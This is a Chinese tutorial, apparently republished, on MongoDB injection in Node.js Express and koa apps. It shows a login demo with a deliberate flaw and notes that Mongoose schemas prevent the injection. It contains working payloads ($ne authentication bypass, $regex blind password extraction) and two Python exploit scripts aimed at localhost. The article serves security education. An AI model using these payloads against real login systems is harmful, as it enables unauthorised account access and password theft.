Mongodb Injection in Node.js Web Framework-mysql教程-PHP中文网

首页

数据库

mysql教程

Mongodb Injection in Node.js Web Framework

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:41 PM

mongodbnode.jsweb

The difference between Express and koa Express 和 koa 都是 Node.js 的 Web 框架，相比较 Express，koa 使用了 generator 作为中间件，减少了大量的 callback，更加轻量一些。在对于不同的 HTTP Method，譬如 GET、POST 的数据的处理上，Express 的行为和

The difference between Express and koa

Express 和 koa 都是 Node.js 的 Web 框架，相比较 Express，koa 使用了 generator 作为中间件，减少了大量的 callback，更加轻量一些。在对于不同的 HTTP Method，譬如 GET、POST 的数据的处理上，Express 的行为和 koa 有一些差异。

GET

在对于 GET 的处理上，Express 和 koa 的一个显著的不同就是：

<code>test[1]=a&test[2]=b
</code>

Expres 的 req.query 会把 test 处理成 Object：

<code>{ test: [ 'a', 'b' ] }
</code>

koa 的 this.request.query 却不会：

<code>{ 'test[1]': 'a', 'test[2]': 'b' }
</code>

在这种情况下，koa 可以避免在 QueryString 内的 Mongodb Injection。

POST

在 POST 中，当 Content-Type 为 application/x-www-form-urlencoded 时，Express和 koa 的行为也是不相同的，对于：

<code>test[a]=123&test[b]=456
</code>

Express 的 req.body 解析后的结果为：

<code>{ 'test[a]': '123', 'test[b]': '456' }
</code>

koa co-body 处理后解析后的结果为：

<code>{ test: { a: '123', b: '456' } }
</code>

当 Content-Type 为 multipart/form-data 时，对于：

<code>------WebKitFormBoundaryxUTB0WY8QmAfDBIp
Content-Disposition: form-data; name="test[a]"
123
------WebKitFormBoundaryxUTB0WY8QmAfDBIp
Content-Disposition: form-data; name="test[b]"
456
------WebKitFormBoundaryxUTB0WY8QmAfDBIp--
</code>

Express 利用 multiparty 解析的结果为：

<code>{ 'test[a]': [ '123', '456' ], 'test[b]': [ '789' ] }
</code>

koa 如果用 multiparty 解析的话，结果相同。
最后，当 Content-Type 为 application/json 时，Express 和 koa 在结果上时相同的，对于：

<code>{"test1": 1, "test2": {"test": "hello"}}
</code>

解析结果都为：

<code>{ test1: 1, test2: { test: 'hello' } }
</code>

另外的 PUT、DELETE 等方法我们不做考虑。
其实这里引入一个 RESUful 的概念，现代 API 多是追求 RESTful 的 API 设计，对于 Web 和 App 有统一的一套接口，然后衍生出一系列所谓“前后端分离”的概念，也出现了许多 JavaScript 框架，AngularJS 就是这样的。AngularJS 和后端通信的方式就是上述 POST 中最后一种，直接 POST JSON 到后端，然后后端进行解析，所以说在这种解析的过程中就会出现一系列的问题，最主要的还是 Mongodb Injection。

Mongodb Injection in Express

这个其实是很常见的问题了，因为攻击威力小，而且开发者稍加注意就可以避免，所以 Mongodb Injection 一直就是不温不火。

对于 Mongodb 的注入，目前可以做到的事 Authenticate Bypass，以及 Blind Injection。比较鸡肋的是 Blind Injection 只能对已知字段进行注入。

我用 Node.js + Mongodb 写了一个简单的登陆系统，当然是有漏洞的，主要是来研究一下漏洞的成因，以及如何避免。
项目地址：https://github.com/RicterZ/simpleLogin

/controllers/user.js

<code>LoginHandler.login = function (request, response) {
    var user = new User({
        username: request.body.username,
        password: request.body.password
    });
    user.login(function (err, user) {
        if (err) {
            response.status(500).json({message: err.toString()})
            return;
        };
        if (!user) {
            response.status(401).json({message: 'Login Fail'});
            return;
        };
        response.status(200).json({user: 'Hello ' + user.username});
    });
};
</code>

此处我们将用户传入的 password 直接带入 User 的 Model，进而调用 login 方法。
/model/users.js

<code>User.prototype.login = function (callback) {
    var _user = {
        username: this.username,
        password: this.password
    };
    db.open(function (err, db) {
        if (err) return callback(err);
        db.collection('users', function (err, collection) {
            if (err) {
                db.close();
                return callback(err);
            };
            collection.findOne(_user, function (err, user) { // Injection
                // do stuff
            });
        });
    });
}
</code>

由于此处我们提交的数据为：

<code>{"username": "test", "password": {"$ne": 1}
</code>

Express 处理后变成一个 JSON Condition 然后进入 Mongodb 的查询中，所以我们可以直接 Bypass 验证，进入 test 的账户。

/controller/user.js

<code>LoginHandler.login2 = function (request, response) {
    var user = new User({
        username: request.body.username,
        password: request.body.password
    });
    user.login(function (err, user) {
        if (err) {
            response.status(500).json({message: err.toString()})
            return;
        };
        if (!user) {
            response.status(401).json({message: 'User not exist'});
            return;
        };
        if (user.password === request.body.password) {
            response.status(200).json({user: 'Hello ' + user.username});
        } else {
            response.status(401).json({message: 'Password is not correct'});
        };
    });
};
</code>

此处和上面不同的是我们验证了密码，如果未获取到用户则显示 User not exist，如果密码和数据库里储存的密码不同则显示 Password is not correct。利用此处的差异我们可以 Blind Injection 出数据库储存的密码为多少。
利用 Mongodb 里的正则表达式：

<code>{"username": "test", "password": {"$regex": "^1"}}
</code>

如果开头的字母为 1，则显示 Password is not correct，如果不为 1，则显示 User not exist。第一位猜测完毕后继续猜解第二位：

<code>{"username": "test", "password": {"$regex": "^11"}}
</code>

重复上述步骤直至猜解结束。

Exploit

0x01

Code:

<code>import urllib2
request = urllib2.Request('http://localhost:3000/login', '{"username": "ricter", "password": {"$ne": 1}}', headers={"Content-Type": "application/json"})
print urllib2.urlopen(request).read()
</code>

Result:

0x02

Code:

<code>import sys
import urllib2
def req(url, data):
    try:
        request = urllib2.Request(url, data, headers={'Content-Type': 'application/json'})
        return urllib2.urlopen(request).read()
    except urllib2.HTTPError, e:
        return e.read()
url = 'http://localhost:3000/login2'
FLAG_USER_NOT_EXIST = 'User not exist'
FLAG_PASSWORD_INCORRECT = 'Password is not correct'
chars = '9876503412'
payload = '{"username": "ricter","password": {"$regex": "^%s"}}'
password = ''
while 1:
    for i in chars:
        resp = req(url, payload % (password + i))
        if FLAG_PASSWORD_INCORRECT in resp:
            password += i
            print password
            break
        elif FLAG_USER_NOT_EXIST in resp:
            pass
        if i == chars[-1]:
            print password
            sys.exit(0)
</code>

Result:

Express with Mongoose

常见的 Node.js 的 Web 应用中，还有一种常见的搭配就是利用 Mongoose 来进行数据的 CRUD。
具体代码参见 simpleLogin 的 mongoose 分支。

使用 Mongoose 我们可以定义每个 document 的 field 的数据类型：

<code>var _User = new db.Schema({                
    username: String,
    password: String,
    apikey: String  
});
</code>

这样的话，我们传入：

<code>{"username": "ricter","password": {"$ne": 1}}
</code>

实际上查询的时候会被转变成：

<code>{ username: 'ricter', password: undefined }
</code>

所以不会造成 Mongodb Injection。

At the end

Node.js 的 Webapp，我本人比较倾向于 koa+mongoose，可以避免一些 Mongodb 的注入的问题，以及代码看起来更为优雅一些。
当然，\Python 大法好/

原文地址：Mongodb Injection in Node.js Web Framework, 感谢原作者分享。

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

说明InnoDB重做日志和撤消日志的作用。Apr 15, 2025 am 12:16 AM

InnoDB使用redologs和undologs确保数据一致性和可靠性。1.redologs记录数据页修改，确保崩溃恢复和事务持久性。2.undologs记录数据原始值，支持事务回滚和MVCC。

在解释输出（类型，键，行，额外）中要查找的关键指标是什么？Apr 15, 2025 am 12:15 AM

EXPLAIN命令的关键指标包括type、key、rows和Extra。1）type反映查询的访问类型，值越高效率越高，如const优于ALL。2）key显示使用的索引，NULL表示无索引。3）rows预估扫描行数，影响查询性能。4）Extra提供额外信息，如Usingfilesort提示需要优化。

在解释中使用临时状态以及如何避免它是什么？Apr 15, 2025 am 12:14 AM

Usingtemporary在MySQL查询中表示需要创建临时表，常见于使用DISTINCT、GROUPBY或非索引列的ORDERBY。可以通过优化索引和重写查询避免其出现，提升查询性能。具体来说，Usingtemporary出现在EXPLAIN输出中时，意味着MySQL需要创建临时表来处理查询。这通常发生在以下情况：1)使用DISTINCT或GROUPBY时进行去重或分组；2)ORDERBY包含非索引列时进行排序；3)使用复杂的子查询或联接操作。优化方法包括：1)为ORDERBY和GROUPB

描述不同的SQL交易隔离级别（读取未读取，读取，可重复的读取，可序列化）及其在MySQL/InnoDB中的含义。Apr 15, 2025 am 12:11 AM

MySQL/InnoDB支持四种事务隔离级别：ReadUncommitted、ReadCommitted、RepeatableRead和Serializable。1.ReadUncommitted允许读取未提交数据，可能导致脏读。2.ReadCommitted避免脏读，但可能发生不可重复读。3.RepeatableRead是默认级别，避免脏读和不可重复读，但可能发生幻读。4.Serializable避免所有并发问题，但降低并发性。选择合适的隔离级别需平衡数据一致性和性能需求。

MySQL与其他数据库：比较选项Apr 15, 2025 am 12:08 AM

MySQL适合Web应用和内容管理系统，因其开源、高性能和易用性而受欢迎。1)与PostgreSQL相比，MySQL在简单查询和高并发读操作上表现更好。2)相较Oracle，MySQL因开源和低成本更受中小企业青睐。3)对比MicrosoftSQLServer，MySQL更适合跨平台应用。4)与MongoDB不同，MySQL更适用于结构化数据和事务处理。

MySQL索引基数如何影响查询性能？Apr 14, 2025 am 12:18 AM

MySQL索引基数对查询性能有显着影响：1.高基数索引能更有效地缩小数据范围，提高查询效率；2.低基数索引可能导致全表扫描，降低查询性能；3.在联合索引中，应将高基数列放在前面以优化查询。

MySQL：新用户的资源和教程Apr 14, 2025 am 12:16 AM

MySQL学习路径包括基础知识、核心概念、使用示例和优化技巧。1)了解表、行、列、SQL查询等基础概念。2)学习MySQL的定义、工作原理和优势。3)掌握基本CRUD操作和高级用法，如索引和存储过程。4)熟悉常见错误调试和性能优化建议，如合理使用索引和优化查询。通过这些步骤，你将全面掌握MySQL的使用和优化。